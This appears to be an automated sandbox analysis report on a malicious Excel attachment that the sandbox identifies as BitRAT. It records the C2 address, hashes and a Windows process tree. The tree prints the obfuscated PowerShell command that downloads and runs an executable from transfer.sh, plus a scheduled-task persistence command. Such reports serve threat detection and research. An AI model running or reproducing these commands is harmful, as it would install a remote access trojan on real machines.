Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2023 15:14

General

  • Target

    Romania_Request_Imun_SRL_09_2023.xls

  • Size

    100KB

  • MD5

    968a96fab78010b987e7a0b8624d2605

  • SHA1

    1e42b6186f040b9868a978450fde05e39a267bf3

  • SHA256

    63e7d413f4653c4b84c8e4c1c4fd4516a245464b3e996aa733ce21c9c1c964b1

  • SHA512

    f953916293565e59e94f2671ef4798eff19d7ff965570d66682c38aeca273331735b638b03653960838bbfac15333364dbfb477135d298d25690b8a95fb65a75

  • SSDEEP

    3072:irxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAftJE2zuxq+fr9wBLa71ba2ryLTHeYB:kxEtjPOtioVjDGUU1qfDlavx+W2QnAVF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Romania_Request_Imun_SRL_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\iq5kz.exe;C:\Users\Public\iq5kz.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4896
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\iq5kz.exe;C:\Users\Public\iq5kz.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4932
        • C:\Users\Public\iq5kz.exe
          "C:\Users\Public\iq5kz.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:652
          • C:\Users\Public\iq5kz.exe
            "C:\Users\Public\iq5kz.exe"
            5⤵
            • Executes dropped EXE
            PID:636
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 188
              6⤵
              • Program crash
              PID:4476
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
            5⤵
              PID:1660
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c copy "C:\Users\Public\iq5kz.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
              5⤵
                PID:2300
              • C:\Windows\SysWOW64\cmd.exe
                "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:488
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                  6⤵
                  • Creates scheduled task(s)
                  PID:1820
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 636 -ip 636
        1⤵
          PID:916
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
          1⤵
            PID:2184
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k UnistackSvcGroup
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1288

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm
            Filesize

            16KB

            MD5

            a9423605c5300059fe88cf581ae5b019

            SHA1

            06b9365870b4948d47164d2b54affedf78de9daa

            SHA256

            3eb9195e7b44c35a654edc69e86d56bd4808c5bf08f920a6e5f637ac7b353182

            SHA512

            2a3e75f0be97d94730059feabd8e735f1495c7948a15466850fbfaf5c42872fbc0131e9a35a7eeea03b5fe150c571a34db8da7eee143593899a4fe70e5e58d9b

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_peibeul4.l2d.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\pint\pint.exe
            Filesize

            3.8MB

            MD5

            6d4c3a4ff3637ec34f820172f897d476

            SHA1

            d53fe8f0ecb0536088ec9be5247ab6627baf31cb

            SHA256

            c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

            SHA512

            1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

          • C:\Users\Public\iq5kz.exe
            Filesize

            3.8MB

            MD5

            6d4c3a4ff3637ec34f820172f897d476

            SHA1

            d53fe8f0ecb0536088ec9be5247ab6627baf31cb

            SHA256

            c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

            SHA512

            1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

          • C:\Users\Public\iq5kz.exe
            Filesize

            3.8MB

            MD5

            6d4c3a4ff3637ec34f820172f897d476

            SHA1

            d53fe8f0ecb0536088ec9be5247ab6627baf31cb

            SHA256

            c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

            SHA512

            1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

          • C:\Users\Public\iq5kz.exe
            Filesize

            3.8MB

            MD5

            6d4c3a4ff3637ec34f820172f897d476

            SHA1

            d53fe8f0ecb0536088ec9be5247ab6627baf31cb

            SHA256

            c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

            SHA512

            1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

          • memory/636-84-0x0000000000D10000-0x00000000010DE000-memory.dmp
            Filesize

            3.8MB

          • memory/636-80-0x0000000000D10000-0x00000000010DE000-memory.dmp
            Filesize

            3.8MB

          • memory/636-74-0x0000000000D10000-0x00000000010DE000-memory.dmp
            Filesize

            3.8MB

          • memory/652-69-0x00000000752D0000-0x0000000075A80000-memory.dmp
            Filesize

            7.7MB

          • memory/652-72-0x0000000002B80000-0x0000000002B90000-memory.dmp
            Filesize

            64KB

          • memory/652-79-0x00000000752D0000-0x0000000075A80000-memory.dmp
            Filesize

            7.7MB

          • memory/652-71-0x00000000056E0000-0x0000000005C84000-memory.dmp
            Filesize

            5.6MB

          • memory/652-70-0x0000000000540000-0x0000000000918000-memory.dmp
            Filesize

            3.8MB

          • memory/1288-129-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-126-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-120-0x000001581C790000-0x000001581C791000-memory.dmp
            Filesize

            4KB

          • memory/1288-104-0x00000158141A0000-0x00000158141B0000-memory.dmp
            Filesize

            64KB

          • memory/1288-88-0x00000158140A0000-0x00000158140B0000-memory.dmp
            Filesize

            64KB

          • memory/1288-122-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-123-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-124-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-125-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-121-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-127-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-128-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-130-0x000001581C7B0000-0x000001581C7B1000-memory.dmp
            Filesize

            4KB

          • memory/1288-131-0x000001581C3E0000-0x000001581C3E1000-memory.dmp
            Filesize

            4KB

          • memory/1288-132-0x000001581C3D0000-0x000001581C3D1000-memory.dmp
            Filesize

            4KB

          • memory/1288-134-0x000001581C3E0000-0x000001581C3E1000-memory.dmp
            Filesize

            4KB

          • memory/1288-137-0x000001581C3D0000-0x000001581C3D1000-memory.dmp
            Filesize

            4KB

          • memory/1948-17-0x00007FFCBE200000-0x00007FFCBE210000-memory.dmp
            Filesize

            64KB

          • memory/1948-8-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-49-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-53-0x000001C3A5590000-0x000001C3A5D90000-memory.dmp
            Filesize

            8.0MB

          • memory/1948-54-0x000001C3A5590000-0x000001C3A5D90000-memory.dmp
            Filesize

            8.0MB

          • memory/1948-55-0x000001C3A5590000-0x000001C3A5D90000-memory.dmp
            Filesize

            8.0MB

          • memory/1948-167-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-166-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-165-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-1-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-2-0x00007FFCC0650000-0x00007FFCC0660000-memory.dmp
            Filesize

            64KB

          • memory/1948-4-0x00007FFCC0650000-0x00007FFCC0660000-memory.dmp
            Filesize

            64KB

          • memory/1948-5-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-33-0x000001C3A5590000-0x000001C3A5D90000-memory.dmp
            Filesize

            8.0MB

          • memory/1948-32-0x000001C3A5590000-0x000001C3A5D90000-memory.dmp
            Filesize

            8.0MB

          • memory/1948-30-0x000001C3A5590000-0x000001C3A5D90000-memory.dmp
            Filesize

            8.0MB

          • memory/1948-23-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-20-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-21-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-22-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-19-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-0-0x00007FFCC0650000-0x00007FFCC0660000-memory.dmp
            Filesize

            64KB

          • memory/1948-18-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-16-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-15-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-14-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-13-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-12-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-11-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-9-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-10-0x00007FFCBE200000-0x00007FFCBE210000-memory.dmp
            Filesize

            64KB

          • memory/1948-48-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/1948-7-0x00007FFCC0650000-0x00007FFCC0660000-memory.dmp
            Filesize

            64KB

          • memory/1948-6-0x00007FFCC0650000-0x00007FFCC0660000-memory.dmp
            Filesize

            64KB

          • memory/1948-3-0x00007FFD005D0000-0x00007FFD007C5000-memory.dmp
            Filesize

            2.0MB

          • memory/4932-44-0x0000021DB88E0000-0x0000021DB8902000-memory.dmp
            Filesize

            136KB

          • memory/4932-45-0x00007FFCD5310000-0x00007FFCD5DD1000-memory.dmp
            Filesize

            10.8MB

          • memory/4932-68-0x00007FFCD5310000-0x00007FFCD5DD1000-memory.dmp
            Filesize

            10.8MB

          • memory/4932-46-0x0000021DB8960000-0x0000021DB8970000-memory.dmp
            Filesize

            64KB

          • memory/4932-47-0x0000021DB8960000-0x0000021DB8970000-memory.dmp
            Filesize

            64KB

          • memory/4932-57-0x0000021DB8960000-0x0000021DB8970000-memory.dmp
            Filesize

            64KB

          • memory/4932-56-0x00007FFCD5310000-0x00007FFCD5DD1000-memory.dmp
            Filesize

            10.8MB